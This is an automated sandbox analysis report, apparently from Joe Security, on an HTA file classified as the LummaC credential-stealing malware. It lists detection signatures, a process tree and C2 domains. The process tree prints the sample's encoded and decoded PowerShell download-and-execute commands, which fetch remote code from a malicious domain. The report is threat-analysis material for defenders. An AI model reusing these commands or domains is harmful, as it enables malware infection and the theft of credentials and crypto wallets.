Windows Analysis Report
anrek.mp4.hta
Overview
General Information
Detection
LummaC Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 5784 cmdline: mshta.exe "C:\Users\user\Desktop\anrek.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 6160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AawBsAGkAcABkAGkAaABlAHEAbwBlAC4AcwBoAG8AcAAvAHIAdQB3AGsAbAAuAHAAbgBnACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2804 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://klipdiheqoe.shop/ruwkl.png'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4244 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- FQCBPDRKWCIGP0ODQG879LFLUZ.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\Temp\FQCBPDRKWCIGP0ODQG879LFLUZ.exe" MD5: C89C55FE25372BFBF8B9264A647C144B)
- FQCBPDRKWCIGP0ODQG879LFLUZ.tmp (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\is-UFG0L.tmp\FQCBPDRKWCIGP0ODQG879LFLUZ.tmp" /SL5="$80224,7875736,845824,C:\Users\user\AppData\Local\Temp\FQCBPDRKWCIGP0ODQG879LFLUZ.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
- FQCBPDRKWCIGP0ODQG879LFLUZ.exe (PID: 1852 cmdline: "C:\Users\user\AppData\Local\Temp\FQCBPDRKWCIGP0ODQG879LFLUZ.exe" /VERYSILENT MD5: C89C55FE25372BFBF8B9264A647C144B)
- FQCBPDRKWCIGP0ODQG879LFLUZ.tmp (PID: 6156 cmdline: "C:\Users\user\AppData\Local\Temp\is-OMTBU.tmp\FQCBPDRKWCIGP0ODQG879LFLUZ.tmp" /SL5="$D005A,7875736,845824,C:\Users\user\AppData\Local\Temp\FQCBPDRKWCIGP0ODQG879LFLUZ.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
- cleanup
{"C2 url": ["noisycuttej.shop", "tirepublicerj.shop", "framekgirus.shop", "nearycrepso.shop", "grooveoiy.cyou", "abruptyopsn.shop", "wholersorie.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "c2CoW0--RIII"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: |